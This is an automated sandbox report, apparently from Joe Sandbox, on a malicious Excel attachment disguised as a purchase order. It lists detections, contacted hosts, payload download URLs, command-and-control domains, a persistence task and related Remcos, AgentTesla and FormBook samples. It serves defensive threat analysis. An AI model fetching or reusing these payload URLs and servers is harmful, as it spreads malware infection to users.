            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday[1].doc | 100% | Avira | HEUR/Rtf.Malformed
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EADD419E.doc | 100% | Avira | HEUR/Rtf.Malformed
            C:\Users\user\AppData\Roaming\dagifhd | 0% | ReversingLabs
            C:\Users\user\AppData\Roaming\dagifhd | 0% | Virustotal
            No Antivirus matches
            Source | Detection | Scanner | Label
            crash.sh | 3% | Virustotal
            ia803104.us.archive.org | 1% | Virustotal
            prolinice.ga | 16% | Virustotal
            Source | Detection | Scanner | Label
            https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
            https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
            http://ocsp.entrust.net03 | 0% | URL Reputation | safe
            https://contoso.com/License | 0% | URL Reputation | safe
            http://www.mozilla.com0 | 0% | URL Reputation | safe
            http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
            https://contoso.com/ | 0% | URL Reputation | safe
            https://nuget.org/nuget.exe | 0% | URL Reputation | safe
            https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg | 100% | URL Reputation | malware
            http://ocsp.entrust.net0D | 0% | URL Reputation | safe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
            http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
            http://crl.entrust.net/server1.crl0 | 0% | URL Reputation | safe
            https://contoso.com/Icon | 0% | URL Reputation | safe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
            https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search | 0% | URL Reputation | safe
            https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
            https://support.mozilla.org | 0% | URL Reputation | safe
            https://secure.comodo.com/CPS0 | 0% | URL Reputation | safe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
            https://crash.sh/udMVqm | 0% | Avira URL Cloud | safe
            http://wrbvhkkkwfg.com/ | 0% | Avira URL Cloud | safe
            http://crl.entrust.net/2048ca.crl0 | 0% | URL Reputation | safe
            http://prolinice.ga/ndex.php | 0% | Avira URL Cloud | safe
            https://ia803104.us.archive.org | 0% | Avira URL Cloud | safe
            http://23.94.148.16/90/gn/inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday.doc | 0% | Avira URL Cloud | safe
            http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIFj | 0% | Avira URL Cloud | safe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | Avira URL Cloud | safe
            http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIF | 0% | Avira URL Cloud | safe
            https://ia803104.us.archive.org | 1% | Virustotal
            http://prolinice.ga/ndex.php | 1% | Virustotal
            http://www.autoitscript.com/autoit3 | 0% | Avira URL Cloud | safe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | Virustotal
            http://prolinice.ga/index.php | 100% | Avira URL Cloud | malware
            https://crash.sh/udMVqm | 0% | Virustotal
            http://vilendar.ga/index.php | 100% | Avira URL Cloud | malware
            https://ia803104.us.archive.org/27/items/vbs_20240LR | 0% | Avira URL Cloud | safe
            http://www.piriform.com/ccleanerxe | 0% | Avira URL Cloud | safe
            http://prolinice.ga/ | 0% | Avira URL Cloud | safe
            http://www.autoitscript.com/autoit3 | 0% | Virustotal
            http://wrbvhkkkwfg.com/application/x-www-form-urlencodedMozilla/5.0 | 0% | Avira URL Cloud | safe
            https://ia803104.us.archive.org/27/items/vbs_20240LR | 1% | Virustotal
            http://vilendar.ga/index.php | 17% | Virustotal
            http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIFj | 1% | Virustotal
            http://prolinice.ga/index.php | 19% | Virustotal
            https://www.google.com/favicon.ico | 0% | Avira URL Cloud | safe
            http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIF | 1% | Virustotal
            http://java.sun.com | 0% | Avira URL Cloud | safe
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | Avira URL Cloud | safe
            http://prolinice.ga/ | 16% | Virustotal
            http://23.94.148.16/90/gn/inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday.doc | 1% | Virustotal
            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | 0% | Avira URL Cloud | safe
            http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0 | 0% | Avira URL Cloud | safe
            http://java.sun.com | 0% | Virustotal
            https://crash.sh/ | 0% | Avira URL Cloud | safe
            http://23.94.148.16 | 0% | Avira URL Cloud | safe
            http://www.piriform.com/ccleaner | 0% | Avira URL Cloud | safe
            https://www.google.com/favicon.ico | 0% | Virustotal
            http://23.94.148.16/90/WEFV.txt | 0% | Avira URL Cloud | safe
            http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0 | 1% | Virustotal
            https://crash.sh/udMVqmyX | 0% | Avira URL Cloud | safe
            http://23.94.148.16 | 0% | Virustotal
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | Virustotal
            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | 0% | Virustotal
            http://prolinice.ga/index.phpMozilla/5.0 | 0% | Avira URL Cloud | safe
            http://www.piriform.com/ccleaner | 0% | Virustotal
            https://crash.sh/udMVqm--C | 0% | Avira URL Cloud | safe
            http://23.94.148.16/90/WEFV.txt | 1% | Virustotal
            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | Avira URL Cloud | safe
            https://crash.sh/ | 2% | Virustotal
            http://prolinice.ga/index.phpMozilla/5.0 | 1% | Virustotal
            https://crash.sh/udMVqmyX | 3% | Virustotal
            https://crash.sh/udMVqm--C | 0% | Virustotal
            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | Virustotal
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            crash.sh | 208.64.171.230 | true | true | | unknown
            ia803104.us.archive.org | 207.241.232.154 | true | true | | unknown
            prolinice.ga | 185.251.91.119 | true | true | | unknown
            Name | Malicious | Antivirus Detection | Reputation
            https://crash.sh/udMVqm | false
            • 0%, Virustotal
            • Avira URL Cloud: safe
            unknown
            http://23.94.148.16/90/gn/inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday.doc | true
            • 1%, Virustotal
            • Avira URL Cloud: safe
            unknown
            http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIF | true
            • 1%, Virustotal
            • Avira URL Cloud: safe
            unknown
            https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg | true
            • URL Reputation: malware
            unknown
            http://prolinice.ga/index.php | true
            • 19%, Virustotal
            • Avira URL Cloud: malware
            unknown
            http://vilendar.ga/index.php | true
            • 17%, Virustotal
            • Avira URL Cloud: malware
            unknown
            http://23.94.148.16/90/WEFV.txt | true
            • 1%, Virustotal
            • Avira URL Cloud: safe
            unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | explorer.exe, 00000013.00000003.511484280.00000000003D8000.00000004.00000020.00020000.00000000.sdmp, 7947.tmp.19.dr | false | URL Reputation: safe | unknown
http://prolinice.ga/ndex.php | explorer.exe, 00000013.00000002.514628656.00000000003C4000.00000004.00000020.00020000.00000000.sdmp | true | 1%, Virustotal; Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | explorer.exe, 00000013.00000003.511484280.00000000003D8000.00000004.00000020.00020000.00000000.sdmp, 7947.tmp.19.dr | false | URL Reputation: safe | unknown
http://wrbvhkkkwfg.com/ | explorer.exe, 0000000F.00000002.626188065.0000000007B6D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ia803104.us.archive.org | powershell.exe, 0000000D.00000002.453954500.000000000231B000.00000004.00000800.00020000.00000000.sdmp | true | 1%, Virustotal; Avira URL Cloud: safe | unknown
http://ocsp.entrust.net03 | powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 0000000D.00000002.454453172.0000000003209000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.mozilla.com0 | explorer.exe, 0000000F.00000000.464950376.0000000003B98000.00000004.00000010.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIFj | EQNEDT32.EXE, 00000009.00000002.438240089.00000000005FE000.00000004.00000020.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 0000000D.00000002.454453172.0000000003209000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 0000000D.00000002.454453172.0000000003209000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.autoitscript.com/autoit3 | explorer.exe, 0000000F.00000000.464570167.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.624600710.00000000001D6000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://ocsp.entrust.net0D | powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000000B.00000002.457563315.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.453954500.00000000021E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ia803104.us.archive.org/27/items/vbs_20240LR | powershell.exe, 0000000B.00000002.457563315.00000000024F1000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
http://www.piriform.com/ccleanerxe | explorer.exe, 0000000F.00000000.464803412.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.625357590.000000000260D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 0000000D.00000002.454453172.0000000003209000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.entrust.net/server1.crl0 | powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://prolinice.ga/ | explorer.exe, 00000013.00000002.514628656.00000000003C4000.00000004.00000020.00020000.00000000.sdmp | true | 16%, Virustotal; Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000D.00000002.454453172.0000000003209000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | explorer.exe, 00000013.00000003.511484280.00000000003D8000.00000004.00000020.00020000.00000000.sdmp, 7947.tmp.19.dr | false | URL Reputation: safe | unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search | explorer.exe, 00000013.00000003.511484280.00000000003D8000.00000004.00000020.00020000.00000000.sdmp, 7947.tmp.19.dr | false | URL Reputation: safe | unknown
http://wrbvhkkkwfg.com/application/x-www-form-urlencodedMozilla/5.0 | explorer.exe, 0000000F.00000002.626188065.0000000007B6D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/favicon.ico | 7947.tmp.19.dr | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | explorer.exe, 00000013.00000003.511484280.00000000003D8000.00000004.00000020.00020000.00000000.sdmp, 7947.tmp.19.dr | false | URL Reputation: safe | unknown
http://java.sun.com | explorer.exe, 0000000F.00000000.464570167.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.624600710.00000000001D6000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 0000000F.00000000.465313986.0000000007B42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.464803412.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.626188065.0000000007B42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.626188065.0000000007AA6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.465011761.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.625357590.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.625742820.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0 | explorer.exe, 00000013.00000002.514628656.00000000003C4000.00000004.00000020.00020000.00000000.sdmp | true | 1%, Virustotal; Avira URL Cloud: safe | unknown
https://crash.sh/ | crash.sh.url.4.dr | false | 2%, Virustotal; Avira URL Cloud: safe | unknown
http://23.94.148.16 | powershell.exe, 0000000D.00000002.453954500.000000000243A000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://www.piriform.com/ccleaner | explorer.exe, 0000000F.00000000.465313986.0000000007B42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.464803412.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.626188065.0000000007B42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.626188065.0000000007AA6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.465011761.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.625357590.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.625742820.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://crash.sh/udMVqmyX | 96630000.0.dr, ~DF5F0CCF6F4019BF3C.TMP.0.dr | false | 3%, Virustotal; Avira URL Cloud: safe | unknown
https://support.mozilla.org | explorer.exe, 0000000F.00000000.464570167.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.624600710.00000000001D6000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://prolinice.ga/index.phpMozilla/5.0 | explorer.exe, 00000013.00000002.514628656.0000000000394000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.507625773.00000000001EE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.510291767.0000000000644000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.624681421.0000000000474000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.624657376.00000000002CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.624815942.0000000000594000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000002.624601316.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.624734588.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.624623660.000000000015E000.00000004.00000020.00020000.00000000.sdmp | true | 1%, Virustotal; Avira URL Cloud: safe | unknown
https://secure.comodo.com/CPS0 | powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | explorer.exe, 00000013.00000003.511484280.00000000003D8000.00000004.00000020.00020000.00000000.sdmp, 7947.tmp.19.dr | false | URL Reputation: safe | unknown
https://crash.sh/udMVqm--C | 40830001.xls | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://crl.entrust.net/2048ca.crl0 | powershell.exe, 0000000D.00000002.456171485.0000000004F6F000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | explorer.exe, 00000013.00000003.511484280.00000000003D8000.00000004.00000020.00020000.00000000.sdmp, 7947.tmp.19.dr | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
207.241.232.154 | ia803104.us.archive.org | United States | 7941 | INTERNET-ARCHIVEUS | true
208.64.171.230 | crash.sh | United States | 30600 | AS-CMNUS | true
23.94.148.16 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
185.251.91.119 | prolinice.ga | Russian Federation | 35278 | SPRINTHOSTRU | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1502223
Start date and time: 2024-08-31 15:49:42 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 31s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 29
Number of new started drivers analysed: 1
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 40830001.xls (renamed because the original name is a hash value)
Original Sample Name: TO _SC13060P-CS_19 6 PO()POTWN#P20240830001.xls
Detection: MAL
Classification: mal100.bank.troj.spyw.expl.evad.winXLS@32/34@13/4
EGA Information:
• Successful, ratio: 80%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 134
• Number of non-executed functions: 93
Cookbook Comments:
• Found application associated with file extension: .xls
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Active ActiveX Object
• Active ActiveX Object
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe, svchost.exe
• Execution Graph export aborted for target EQNEDT32.EXE, PID 3996 because there are no executed functions
• Execution Graph export aborted for target dagifhd, PID 1216 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 2984 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
06:51:42 | Task Scheduler | Run new task: Firefox Default Browser Agent 7553EB618C6629DD path: C:\Users\user\AppData\Roaming\dagifhd
09:51:12 | API Interceptor | 37x Sleep call for process: EQNEDT32.EXE modified
09:51:13 | API Interceptor | 7x Sleep call for process: wscript.exe modified
09:51:14 | API Interceptor | 79x Sleep call for process: powershell.exe modified
09:51:27 | API Interceptor | 3354x Sleep call for process: explorer.exe modified
09:51:42 | API Interceptor | 225x Sleep call for process: taskeng.exe modified
09:51:43 | API Interceptor | 1x Sleep call for process: dagifhd modified
Match | Associated Sample Name / URL | Detection | Threat Name
207.241.232.154 | inv-lista de embalaje de envío 08-29.xlam.xlsx | malicious | AgentTesla
207.241.232.154 | RFQ_0030829024SEPT.xla.xlsx | malicious | Remcos
207.241.232.154 | RFQ -PO-SMT290824.xls | malicious | Remcos
207.241.232.154 | SI_56127.vbs | malicious | Remcos
207.241.232.154 | CAN_POST2617276.vbs | malicious | Remcos
207.241.232.154 | CAN_POST7865678.vbs | malicious | AsyncRAT
207.241.232.154 | Sepco RFQ.xls | malicious | Remcos
207.241.232.154 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.9070.28632.rtf | malicious | Remcos
207.241.232.154 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.24787.2174.rtf | malicious | Remcos
207.241.232.154 | PMT-INV0230824AUG.xla.xlsx | malicious | Remcos
208.64.171.230 | Paul Meeting Proposal and Schedule.xls | malicious | FormBook
Match | Associated Sample Name / URL | Detection | Threat Name | Context
prolinice.ga | #20240627_Edlen_B.xls | malicious | SmokeLoader | 77.232.129.190
prolinice.ga | 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe | malicious | SmokeLoader | 77.232.129.190
prolinice.ga | #20240627_Edlen_A.xls | malicious | SmokeLoader | 77.232.129.190
ia803104.us.archive.org | inv-lista de embalaje de envío 08-29.xlam.xlsx | malicious | AgentTesla | 207.241.232.154
ia803104.us.archive.org | RFQ_0030829024SEPT.xla.xlsx | malicious | Remcos | 207.241.232.154
ia803104.us.archive.org | RFQ -PO-SMT290824.xls | malicious | Remcos | 207.241.232.154
ia803104.us.archive.org | SI_56127.vbs | malicious | Remcos | 207.241.232.154
ia803104.us.archive.org | CAN_POST2617276.vbs | malicious | Remcos | 207.241.232.154
ia803104.us.archive.org | CAN_POST7865678.vbs | malicious | AsyncRAT | 207.241.232.154
ia803104.us.archive.org | Sepco RFQ.xls | malicious | Remcos | 207.241.232.154
ia803104.us.archive.org | SecuriteInfo.com.Exploit.CVE-2017-11882.123.9070.28632.rtf | malicious | Remcos | 207.241.232.154
ia803104.us.archive.org | SecuriteInfo.com.Exploit.CVE-2017-11882.123.24787.2174.rtf | malicious | Remcos | 207.241.232.154
ia803104.us.archive.org | PMT-INV0230824AUG.xla.xlsx | malicious | Remcos | 207.241.232.154
crash.sh | Paul Meeting Proposal and Schedule.xls | malicious | FormBook | 208.64.171.230
crash.sh | https://protect-eu.mimecast.com/s/ps2yCL7ZzTEr6KVUPRpdf?domain=youtube.com | malicious | Unknown | 137.184.218.116
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AS-CMNUS | Paul Meeting Proposal and Schedule.xls | malicious | FormBook | 208.64.171.230
AS-CMNUS | zisD7MC388.elf | malicious | Mirai | 199.66.82.92
AS-CMNUS | 8gJ5wLVFMQ.elf | malicious | Mirai | 172.87.18.44
AS-CMNUS | huhu.mpsl.elf | malicious | Mirai, Okiru | 217.180.232.5
AS-CMNUS | i586.elf | malicious | Mirai | 69.174.140.74
AS-CMNUS | m1vvw0vLkD.elf | malicious | Mirai | 69.174.140.62
AS-CMNUS | jUXLsJHqkS.elf | malicious | Mirai | 69.174.164.74
AS-CMNUS | kpYawcK42x.elf | malicious | Mirai | 162.211.35.109
AS-CMNUS | nF83DvSCoH.elf | malicious | Mirai | 69.174.140.77
AS-CMNUS | uuCAncltoX.elf | malicious | Mirai | 199.66.82.98
SPRINTHOSTRU | 2ZJuaB7CQ4.exe | malicious | DCRat | 141.8.194.149
SPRINTHOSTRU | 5P9EdUgv5r.exe | malicious | DCRat | 141.8.194.149
SPRINTHOSTRU | 06wRHV3NYY.exe | malicious | DCRat | 141.8.192.103
SPRINTHOSTRU | bfderfg.exe | malicious | DCRat, PureLog Stealer, zgRAT | 141.8.197.42
SPRINTHOSTRU | YMtjYvZX2i.exe | malicious | DCRat | 141.8.197.42
SPRINTHOSTRU | p7oBHwDt23.exe | malicious | DCRat | 141.8.197.42
SPRINTHOSTRU | pxkGBmsm1Y.exe | malicious | DCRat | 141.8.193.236
SPRINTHOSTRU | N7lmWFMEgx.exe | malicious | DCRat | 141.8.192.126
SPRINTHOSTRU | X1BQ0d74HR.exe | malicious | DCRat | 141.8.197.42
SPRINTHOSTRU | KE4FVpmbfO.exe | malicious | DCRat | 141.8.192.151
INTERNET-ARCHIVEUS | INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js | malicious | AgentTesla | 207.241.227.86
INTERNET-ARCHIVEUS | inv-lista de embalaje de envío 08-29.xlam.xlsx | malicious | AgentTesla | 207.241.232.154
INTERNET-ARCHIVEUS | Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js | malicious | AgentTesla | 207.241.227.86
INTERNET-ARCHIVEUS | RFQ_0030829024SEPT.xla.xlsx | malicious | Remcos | 207.241.232.154
INTERNET-ARCHIVEUS | RFQ -PO-SMT290824.xls | malicious | Remcos | 207.241.232.154
INTERNET-ARCHIVEUS | SI_56127.vbs | malicious | Remcos | 207.241.232.154
INTERNET-ARCHIVEUS | CAN_POST2617276.vbs | malicious | Remcos | 207.241.232.154
INTERNET-ARCHIVEUS | CAN_POST7865678.vbs | malicious | AsyncRAT | 207.241.232.154
INTERNET-ARCHIVEUS | Sepco RFQ.xls | malicious | Remcos | 207.241.232.154
INTERNET-ARCHIVEUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.9070.28632.rtf | malicious | Remcos | 207.241.232.154
AS-COLOCROSSINGUS | rAwGQLtWJr.exe | malicious | Remcos | 23.95.60.82
AS-COLOCROSSINGUS | inv-lista de embalaje de envío 08-29.xlam.xlsx | malicious | AgentTesla | 107.175.229.146
AS-COLOCROSSINGUS | SALKI098765R400.exe | malicious | Remcos | 192.210.150.26
AS-COLOCROSSINGUS | RFQ_0030829024SEPT.xla.xlsx | malicious | Remcos | 198.46.178.181
AS-COLOCROSSINGUS | RFQ -PO-SMT290824.xls | malicious | Remcos | 192.3.140.102
AS-COLOCROSSINGUS | RFQ_0020829024SEPT.xla.xlsx | malicious | Unknown | 198.46.178.181
AS-COLOCROSSINGUS | Sepco RFQ.xls | malicious | Remcos | 192.3.193.155
AS-COLOCROSSINGUS | Thermo Fisher RFQ_TFS-1805.xls | malicious | GuLoader | 107.172.31.21
AS-COLOCROSSINGUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.9070.28632.rtf | malicious | Remcos | 198.46.178.181
AS-COLOCROSSINGUS | BP-30M31_20240829_093844.exe | malicious | Remcos | 192.3.243.155
Match | Associated Sample Name / URL | Detection | Threat Name | Context
05af1f5ca1b87cc9cc9b25185115607d | inv-lista de embalaje de envío 08-29.xlam.xlsx | malicious | AgentTesla | 208.64.171.230, 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | RFQ_0030829024SEPT.xla.xlsx | malicious | Remcos | 208.64.171.230, 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | RFQ -PO-SMT290824.xls | malicious | Remcos | 208.64.171.230, 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | RFQ_0020829024SEPT.xla.xlsx | malicious | Unknown | 208.64.171.230, 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | Sepco RFQ.xls | malicious | Remcos | 208.64.171.230, 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | SecuriteInfo.com.Exploit.CVE-2017-11882.123.9070.28632.rtf | malicious | Remcos | 208.64.171.230, 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | SecuriteInfo.com.Exploit.CVE-2017-11882.123.24787.2174.rtf | malicious | Remcos | 208.64.171.230, 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | PMT-INV0230824AUG.xla.xlsx | malicious | Remcos | 208.64.171.230, 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | ORDER 5172024.xla.xlsx | malicious | Remcos | 208.64.171.230, 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsx | malicious | Remcos | 208.64.171.230, 207.241.232.154
7dcce5b76c8b17472d024758970a406b | Paul Meeting Proposal and Schedule.xls | malicious | FormBook | 208.64.171.230
7dcce5b76c8b17472d024758970a406b | RFQ_0030829024SEPT.xla.xlsx | malicious | Remcos | 208.64.171.230
7dcce5b76c8b17472d024758970a406b | RFQ -PO-SMT290824.xls | malicious | Remcos | 208.64.171.230
7dcce5b76c8b17472d024758970a406b | RFQ_0020829024SEPT.xla.xlsx | malicious | Unknown | 208.64.171.230
7dcce5b76c8b17472d024758970a406b | Sepco RFQ.xls | malicious | Remcos | 208.64.171.230
7dcce5b76c8b17472d024758970a406b | Thermo Fisher RFQ_TFS-1805.xls | malicious | GuLoader | 208.64.171.230
7dcce5b76c8b17472d024758970a406b | Swift Payment.xls | malicious | FormBook | 208.64.171.230
7dcce5b76c8b17472d024758970a406b | Paul Agrotis List.xls | malicious | FormBook | 208.64.171.230
7dcce5b76c8b17472d024758970a406b | PMT-INV0230824AUG.xla.xlsx | malicious | Remcos | 208.64.171.230
